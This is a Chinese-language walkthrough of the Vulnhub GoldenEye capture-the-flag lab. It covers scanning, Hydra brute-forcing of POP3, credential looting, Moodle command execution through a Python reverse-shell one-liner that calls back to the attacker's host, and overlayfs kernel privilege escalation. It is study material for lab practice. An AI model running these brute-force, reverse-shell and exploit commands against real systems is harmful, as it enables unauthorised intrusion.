Vulnhub-(GoldenEye)
字数 1631 2025-08-11 22:57:21
GoldenEye靶机渗透测试教学文档
1. 信息收集阶段
1.1 网络扫描
- 使用
nmap扫描C段网络:nmap -sV 192.168.159.0/24 - 排除本机IP(192.168.159.1)、网关(192.168.159.2)和Kali自身(192.168.159.131),确定靶机IP为192.168.159.154
1.2 深度扫描靶机
nmap -sS -sV -T5 -A 192.168.159.154
发现开放端口:
- 25端口(SMTP)
- 80端口(HTTP)
2. Web应用分析
2.1 访问80端口
- 访问http://192.168.159.154
- 发现一个路径,拼接访问后需要账号密码
- 查看网页源代码,发现一个JS文件
2.2 获取凭据
- JS文件中发现两个用户名:Boris和Natalya
- 发现加密密码:
InvincibleHack3r - 使用Burp Suite解码得到明文密码:
InvincibleHack3r - 成功登录:boris/InvincibleHack3r
2.3 发现新路径
- 访问http://192.168.159.154/sev-home/
- 页面提示POP3服务运行在高端口
3. POP3服务渗透
3.1 扫描高端口
nmap -p- 192.168.159.154
发现两个高端口:55006和55007
3.2 识别POP3服务
nmap -sS -sV -T5 -A -p55006,55007 192.168.159.154
确认55007为POP3服务端口
3.3 暴力破解POP3
- 创建用户名单:
echo -e 'natalya\nboris' > wangkun.txt - 使用Hydra爆破:
hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3 - 获得凭据:
- natalya/bird
- boris/secret1!
3.4 查看邮件内容
使用nc连接POP3服务:
nc 192.168.159.154 55007
查看邮件发现新凭据:
- 用户名:xenia
- 密码:RCP90rulez!
- 域名:severnaya-station.com
- 网址:severnaya-station.com/gnocertdir
4. Moodle CMS渗透
4.1 添加本地hosts
gedit /etc/hosts
添加:
192.168.159.154 severnaya-station.com
4.2 访问Moodle
- 访问http://severnaya-station.com/gnocertdir
- 使用xenia/RCP90rulez!登录
4.3 发现新用户
在"My profile -> Messages"下发现新用户:doak
4.4 爆破doak的POP3
echo 'doak' > wangkun.txt
hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3
获得凭据:doak/goat
4.5 查看doak邮件
发现新凭据:dr_doak/4England!
4.6 发现隐藏信息
在"My private files"下发现s3crer.txt,提示访问:
http://severnaya-station.com/dir007key/for-007.jpg
4.7 分析图片
exiftool for-007.jpg
strings for-007.jpg
发现Base64编码:eFdpbnRlcjE5OTV4IQ==
解码得到:xWinter1995x!
4.8 管理员登录
使用admin/xWinter1995x!成功登录Moodle
5. 漏洞利用
5.1 Moodle 2.2.3漏洞
- CVE-2013-3630
- Exploit-DB编号:29324
5.2 使用MSF失败
msfconsole
search moodle
use exploit/multi/http/moodle_cmd_exec
set username admin
set password xWinter1995x!
set rhost severnaya-station.com
set targeturi /gnocertdir
set payload cmd/unix/reverse
set lhost 192.168.159.131
exploit
失败原因:需要修改执行PSpellShell
5.3 手动执行Python反向Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.131",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
在"My profile->Blogs->Add a new entry"处执行
6. 权限提升
6.1 查看内核版本
uname -a
发现Ubuntu 3.13.0-32
6.2 搜索漏洞
- 漏洞编号:37292
- CVE-2015-1328 (overlayfs提权漏洞)
6.3 利用漏洞
- 查找exp:
searchsploit 37292 - 复制exp:
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root - 修改脚本:
- 将gcc改为cc
- 启动HTTP服务:
python -m SimpleHTTPServer 8081 - 靶机下载:
wget http://192.168.159.131:8081/37292.c - 编译执行:
cc -o exp 37292.c chmod +x exp ./exp id
6.4 获取flag
cat /root/.flag.txt
总结
本靶场渗透测试流程:
- 信息收集 → 2. Web应用分析 → 3. POP3服务渗透 → 4. Moodle CMS渗透 → 5. 漏洞利用 → 6. 权限提升
关键点:
- 注意JS文件中的隐藏信息
- 高端口服务的识别和利用
- 邮件内容中的敏感信息
- 图片文件的隐写分析
- 特定版本CMS的已知漏洞利用
- 内核版本对应的提权漏洞